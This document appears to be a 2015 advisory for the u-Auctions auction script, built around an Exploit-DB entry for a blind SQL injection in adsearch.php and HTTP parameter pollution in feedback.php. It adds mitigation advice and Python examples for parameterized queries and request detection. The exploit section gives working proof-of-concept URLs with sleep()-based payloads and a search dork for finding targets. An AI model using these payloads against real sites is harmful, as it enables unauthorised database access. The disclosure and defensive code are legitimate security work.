Author: Don (Balcan Crew)
CVSS: 5.5 (MEDIUM)
Vulnerability types: Blind SQL injection, HTTP parameter pollution
Affected Version From: ALL
Affected Version To: ALL
Patch Exists: NO
Platforms Tested: Debian
Year: 2015

u-Auctions Multiple Vulnerabilities

This advisory covers two vulnerabilities in the u-Auctions system. The first is a blind SQL injection in /adsearch.php: the URL-encoded POST input 'category' is passed into a query unsanitized, and the advisory confirms it with a sleep()-based (time-based) payload. The second is HTTP parameter pollution in /feedback.php through the GET parameter 'id'. The parameter pollution can be used to override existing parameters, change the application's behaviour, reach variables that are not otherwise user-controlled, and bypass input validation checkpoints and WAF rules.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user inputs, use prepared statements or parameterized queries to prevent SQL injection, and implement proper input validation and parameter handling to prevent HTTP parameter pollution.
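The two mitigations above, written out as an added example (this is not u-Auctions code; the in-memory schema, table rows and function names are constructed for the demonstration). The concatenating query builder shows how the advisory's 'category' value becomes part of the SQL text; the hardened handler allowlists the value as a numeric id and then binds it as a parameter, and the same allowlist rejects the advisory's polluted 'id' value because it contains '&' and '='. SQLite is used only because it ships with Python; it has no sleep() function, so the concatenated statement is built but not executed.

```python
import re
import sqlite3

# Constructed in-memory schema and rows (not u-Auctions' real tables).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE auctions (id INTEGER PRIMARY KEY, title TEXT, category INTEGER)"
    )
    conn.executemany(
        "INSERT INTO auctions VALUES (?, ?, ?)",
        [(1, "Vintage radio", 2), (2, "Acoustic guitar", 3), (3, "Road bicycle", 2)],
    )
    return conn

# The decoded 'category' value from the advisory (sleep() probes placed in
# several quoting contexts).
ADVISORY_CATEGORY = (
    "(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)"
    "+'\"+(select(0)from(select(sleep(0)))v)+\"*/"
)
# The decoded 'id' value from the advisory's parameter-pollution request.
ADVISORY_ID = "1&n903553=v972172"

def vulnerable_search_sql(category):
    """String concatenation: the request value becomes part of the statement text."""
    return "SELECT id, title FROM auctions WHERE category = '" + category + "'"

def require_int_param(name, raw):
    """Allowlist validation: an id-like parameter must be a short run of digits."""
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError(f"parameter {name!r} must be a numeric id")
    return int(raw)

def search_by_category(conn, category_raw):
    """Hardened handler: validate first, then bind the value as a parameter."""
    category = require_int_param("category", category_raw)
    return conn.execute(
        "SELECT id, title FROM auctions WHERE category = ?", (category,)
    ).fetchall()

def search_bound_only(conn, category_raw):
    """Binding alone (no allowlist): the value is data and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, title FROM auctions WHERE category = ?", (category_raw,)
    ).fetchall()

def is_rejected(name, raw):
    """True when the allowlist refuses the raw request value."""
    try:
        require_int_param(name, raw)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_search_sql(ADVISORY_CATEGORY))   # payload inside the SQL text
    print(search_by_category(db, "2"))                 # the two category-2 rows
    print(search_bound_only(db, ADVISORY_CATEGORY))    # [] : bound, not executed as SQL
    print(is_rejected("id", ADVISORY_ID))              # True
```

Binding alone already stops the injection; the allowlist is what closes the parameter-pollution path, since a value that is only digits cannot carry a second query string into any place the application later embeds it.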
Source (Exploit-DB raw data):

# Exploit Title: u-Auctions Multiple Vulnerabilities
# Google Dork: "Powered by u-Auctions ©"
# Date: 03 April 2015
# Exploit Author: Don
# Vendor Homepage: https://www.u-auctions.com/
# Version: ALL
# Tested on: Debian

1. Blind SQL injection:

This vulnerability affects /adsearch.php
URL encoded POST input category was set to
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

POC:

http://www.targetsite.com/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102

Done
+-------------------------------------------------------------------------------------------------------------------------------------+
2. HTTP parameter pollution

This vulnerability affects /feedback.php

URL encoded GET input id was set to 1&n903553=v972172
Parameter precedence: last occurrence
Affected parameter: user_id=1

The impact depends on the affected web application.
An attacker could:
1 = Override existing hardcoded HTTP parameters
2 = Modify the application's behaviour
3 = Access and, potentially, exploit uncontrollable variables
4 = Bypass input validation checkpoints and WAF rules

POC:

http://www.targetsite.com/feedback.php?faction=show&id=1%26n903553%3dv972172

Done
+-------------------------------------------------------------------------------------------------------------------------------------+
There is XSS too but I don't see it useful for anything, so will skip it.
Cheers folks, Don (Balcan Crew) is back! :)
Have fun and have friends!
Shouts to my good friends from past / whoever is online / this website and new kids from the localhost.
~Don 2015
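Detection logic for both findings in the advisory, as an added example that is not part of the original advisory or of u-Auctions. It scans request records (constructed here to mirror the advisory's feedback.php and adsearch.php requests, plus a benign request and a plain duplicate-parameter case) and flags three things: a parameter name that occurs twice (the last-occurrence precedence the advisory observed means the later value wins), a decoded value that is itself a query string such as 1&n903553=v972172, and a time-based SQL injection probe such as the sleep() calls in the 'category' value. The record layout and finding labels are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Functions that stall a query; any of them inside a parameter value is a
# time-based (blind) SQL injection probe like the sleep() one in the advisory.
TIME_BASED_SQLI = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep|waitfor)\s*\(", re.IGNORECASE
)

def analyse_params(query):
    """Return findings for one URL query string or form body (percent-decoded here)."""
    findings = []
    seen = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in seen:
            # Same name twice: classic HPP; a last-occurrence backend (the
            # precedence the advisory observed) would act on the later value.
            findings.append(f"hpp:duplicate:{name}")
        seen.add(name)
        if "&" in value or "=" in value:
            # After decoding, the value is itself a query string ("1&n903553=v972172");
            # it splits into extra parameters if the app re-embeds it unencoded.
            findings.append(f"hpp:embedded:{name}")
        if TIME_BASED_SQLI.search(value):
            findings.append(f"sqli:time-based:{name}")
    return findings

def analyse_request(record):
    """record: dict with 'method', 'target' (path?query) and 'body' (form data or '')."""
    parts = urlsplit(record["target"])
    findings = analyse_params(parts.query)
    if record.get("body"):
        findings += analyse_params(record["body"])
    return [f"{parts.path} {f}" for f in findings]

def scan(records):
    """Map record index -> findings, for flagged records only."""
    result = {}
    for index, record in enumerate(records):
        findings = analyse_request(record)
        if findings:
            result[index] = findings
    return result

# Constructed sample traffic modelled on the advisory's two requests, plus a
# benign request and a plain duplicate-parameter case; not real u-Auctions logs.
SAMPLE_REQUESTS = [
    {"method": "GET", "target": "/feedback.php?faction=show&id=1", "body": ""},
    {"method": "GET", "target": "/feedback.php?faction=show&id=1%26n903553%3dv972172",
     "body": ""},
    {"method": "GET", "target": "/feedback.php?faction=show&id=1&id=2", "body": ""},
    {"method": "POST", "target": "/adsearch.php",
     "body": ("action=search&category=(select(0)from(select(sleep(0)))v)/*'%2b"
              "(select(0)from(select(sleep(0)))v)%2b'%22%2b"
              "(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y")},
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        print(index, SAMPLE_REQUESTS[index]["method"], findings)
```

The POST body has to be inspected as well as the URL because the advisory's injection point is a POST parameter, which a plain access log never records; this example assumes the request body is available from a reverse proxy or WAF log.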